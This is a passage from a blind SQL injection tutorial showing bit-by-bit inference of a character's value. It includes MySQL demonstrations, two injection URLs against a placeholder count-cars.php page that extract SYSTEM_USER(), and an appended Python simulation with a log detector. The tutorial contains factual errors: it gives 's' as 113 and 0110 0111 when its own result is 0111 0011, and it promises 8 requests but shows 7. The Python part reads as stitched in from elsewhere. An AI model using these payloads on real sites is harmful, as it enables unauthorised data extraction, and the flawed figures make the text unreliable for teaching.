Blind SQL Injection # bit-by-bit Inference

In the previous example we used a binary search technique to recover each character of SYSTEM_USER by inferring a whole byte (8 bits) across a series of requests.

Now you will use another technique, in which each request tests a single bit at a chosen position.

Take the character s as an example: its decimal value is 113₁₀ and its binary value is 0110 0111₂. To apply the bit-by-bit technique, you bitwise AND the character's value against a byte that has a single bit set at the position of interest; if the predicate returns true that bit is 1, otherwise it is 0.

Let's start with the 8 requests, one per bit, corresponding to 64₁₀, 32₁₀, 16₁₀, 8₁₀, 4₁₀, 2₁₀ and 1₁₀.

mysql> SELECT ASCII('s') & 64 = 64;
+----------------------+
| ASCII('s') & 64 = 64 |
+----------------------+
|                    1 |
+----------------------+
mysql> SELECT ASCII('s') & 32 = 32;
+----------------------+
| ASCII('s') & 32 = 32 |
+----------------------+
|                    1 |
+----------------------+
mysql> SELECT ASCII('s') & 16 = 16;
+----------------------+
| ASCII('s') & 16 = 16 |
+----------------------+
|                    1 |
+----------------------+
mysql> SELECT ASCII('s') & 8 = 8;
+----------------------+
| ASCII('s') & 8 = 8   |
+----------------------+
|                    0 |
+----------------------+
mysql> SELECT ASCII('s') & 4 = 4;
+----------------------+
| ASCII('s') & 4 = 4   |
+----------------------+
|                    0 |
+----------------------+
mysql> SELECT ASCII('s') & 2 = 2;
+----------------------+
| ASCII('s') & 2 = 2   |
+----------------------+
|                    1 |
+----------------------+
mysql> SELECT ASCII('s') & 1 = 1;
+----------------------+
| ASCII('s') & 1 = 1   |
+----------------------+
|                    1 |
+----------------------+

And that gives us the byte representation 0111 0011₂.

Let’s apply the same method to infer the value of the SYSTEM_USER which is an unknown value.

You start by checking the length of SYSTEM_USER, which tells you how many characters (positions) there are to check:

LENGTH(SYSTEM_USER())

http://example.com/count-cars.php?car_name=Ford' AND LENGTH(SYSTEM_USER()) = '14

Then you take the ASCII value of the first character and test it against 64₁₀:

ASCII(SUBSTRING(SYSTEM_USER(), 1,1)) & 64 = 64

http://example.com/count-cars.php?car_name=Ford' AND ASCII(SUBSTRING(SYSTEM_USER(), 1,1)) %26 '64' = '64

If the predicate is true the number of cars is displayed, otherwise you get the message Nothing to show.

You have to keep issuing these requests: for each character (position) you make 8 requests, from 64₁₀ down to 1₁₀. Since the length of the username is 14, that gives a total of 14 positions * 8 requests = 112 requests.
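As an added illustration (not the article's own code), the Python below models the oracle locally: probe_bit stands in for the page answering the ASCII(SUBSTRING(...)) & mask = mask predicate, infer_string drives the 8 probes per position the article counts, and is_bit_probe is a hypothetical detector for the URL shape shown above. The 14-character SYSTEM_USER value and the log query strings are constructed; nothing here touches a network.

```python
import re
from urllib.parse import unquote_plus

# Constructed 14-character stand-in for the unknown SYSTEM_USER() value.
SECRET = "root@localhost"

# The bits probed, most significant first. 128 is always 0 for 7-bit
# ASCII, so that probe only confirms the value is plain ASCII.
MASKS = (128, 64, 32, 16, 8, 4, 2, 1)


def probe_bit(secret: str, position: int, mask: int) -> bool:
    """Local stand-in for the page evaluating
    ... AND ASCII(SUBSTRING(SYSTEM_USER(), position, 1)) & mask = mask.
    True models 'car count shown', False models 'Nothing to show'."""
    return (ord(secret[position - 1]) & mask) == mask


def infer_char(secret: str, position: int) -> tuple[str, int]:
    """Rebuild one character from 8 boolean answers; returns (char, probes)."""
    value = 0
    for mask in MASKS:
        if probe_bit(secret, position, mask):
            value |= mask  # predicate true -> this bit is 1
    return chr(value), len(MASKS)


def infer_string(secret: str, length: int) -> tuple[str, int]:
    """Apply infer_char to positions 1..length (LENGTH() assumed known)."""
    chars, probes = [], 0
    for position in range(1, length + 1):
        char, used = infer_char(secret, position)
        chars.append(char)
        probes += used
    return "".join(chars), probes


# Hypothetical detector: after URL decoding, flag a bitwise AND of
# ASCII(SUBSTRING(...)) against a constant that is compared with itself.
_BIT_PROBE = re.compile(
    r"ASCII\s*\(\s*SUBSTRING\s*\(.*?\)\s*\)\s*&\s*'?(\d+)'?\s*=\s*'?\1'?", re.I)


def is_bit_probe(query_string: str) -> bool:
    """True when the decoded query carries a single-bit (power-of-two) mask."""
    match = _BIT_PROBE.search(unquote_plus(query_string))
    if not match:
        return False
    mask = int(match.group(1))
    return mask > 0 and mask & (mask - 1) == 0


if __name__ == "__main__":
    print(infer_string(SECRET, len(SECRET)))  # ('root@localhost', 112)
```

The request count matches the article's 14 * 8 = 112, and the many near-identical requests that differ only in position and mask are what a WAF or log review can key on.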
